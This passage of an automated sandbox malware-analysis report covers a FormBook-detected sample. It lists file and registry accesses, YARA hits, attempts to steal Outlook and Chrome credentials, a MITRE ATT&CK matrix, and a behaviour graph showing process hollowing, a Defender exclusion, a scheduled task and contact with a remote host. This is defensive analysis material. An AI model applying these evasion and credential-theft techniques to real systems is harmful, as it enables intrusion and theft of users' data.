            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts2
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		612
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
            Scheduled Task/Job            		Boot or Logon Initialization Scripts1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth3
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Shared Modules            		Logon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration3
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer13
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Remote System Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common3
            Obfuscated Files or Information            		Cached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items2
            Software Packing            		DCSync13
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755940 Sample: SecuriteInfo.com.Win32.Cryp... Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 53 www.alrt.info 2->53 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 Sigma detected: Scheduled temp file as task from temp location 2->61 63 6 other signatures 2->63 9 FqJXaFxwEj.exe 5 2->9         started        12 SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe 7 2->12         started        signatures3 process4 file5 65 Multi AV Scanner detection for dropped file 9->65 67 Machine Learning detection for dropped file 9->67 15 FqJXaFxwEj.exe 9->15         started        18 schtasks.exe 1 9->18         started        20 FqJXaFxwEj.exe 9->20         started        45 C:\Users\user\AppData\...\FqJXaFxwEj.exe, PE32 12->45 dropped 47 C:\Users\...\FqJXaFxwEj.exe:Zone.Identifier, ASCII 12->47 dropped 49 C:\Users\user\AppData\Local\...\tmp4724.tmp, XML 12->49 dropped 51 SecuriteInfo.com.W...22126.16591.exe.log, ASCII 12->51 dropped 69 Uses schtasks.exe or at.exe to add and modify task schedules 12->69 71 Adds a directory exclusion to Windows Defender 12->71 73 Injects a PE file into a foreign processes 12->73 22 powershell.exe 21 12->22         started        24 powershell.exe 21 12->24         started        26 schtasks.exe 1 12->26         started        28 SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe 12->28         started        signatures6 process7 signatures8 83 Modifies the context of a thread in another process (thread injection) 15->83 85 Maps a DLL or memory area into another process 15->85 87 Sample uses process hollowing technique 15->87 89 Queues an APC in another process (thread injection) 15->89 30 explorer.exe 15->30 injected 34 conhost.exe 18->34         started        36 conhost.exe 22->36         started        38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        process9 dnsIp10 55 www.somethingyourselves.com 103.193.185.8, 49697, 80 EHOSTIDC-AS-KREHOSTICTKR Hong Kong 30->55 91 System process connects to network (likely due to code injection or exploit) 30->91 42 cmd.exe 30->42         started        signatures11 process12 signatures13 75 Tries to steal Mail credentials (via file / registry access) 42->75 77 Tries to harvest and steal browser information (history, passwords, etc) 42->77 79 Modifies the context of a thread in another process (thread injection) 42->79 81 Maps a DLL or memory area into another process 42->81

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe29%ReversingLabsWin32.Trojan.Swotter
            SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe29%ReversingLabsWin32.Trojan.Swotter

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            9.0.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.sajatypeworks.comiv0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.c0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fontbureau.como0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sajatypeworks.come0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
